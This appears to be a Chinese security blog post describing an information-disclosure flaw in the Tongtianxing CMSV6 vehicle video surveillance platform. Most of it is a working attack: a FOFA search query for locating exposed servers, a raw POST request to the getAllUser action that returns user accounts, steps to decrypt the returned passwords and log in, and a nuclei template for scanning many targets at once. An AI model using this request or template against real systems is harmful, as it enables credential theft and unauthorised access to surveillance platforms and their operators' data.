本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

漏洞描述

通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞

fofa语句

body="/808gps/"

漏洞复现

打开页面

构造payload

POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Content-Length: 9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

json=null

将拿到的密码进行解密

使用账号密码进行登录

nuclei批量验证

id: TongTianXin-CMS-Information-disclosure

info:
  name: 通天星CMSV6 车载视频监控平台 信息泄露漏
  author: changge
  severity: high
  description: |
    通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞。
  metadata:
    fofa-query: body="/808gps/"
  reference:
    - https://127.0.0.1
  tags: cms,tongtianxin,Information disclosure

http:
  - raw:
      - |
        POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        json=null


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "admin"

github poc总汇地址：https://github.com/AYcg/poc

本文章首发于公众号【AY长歌】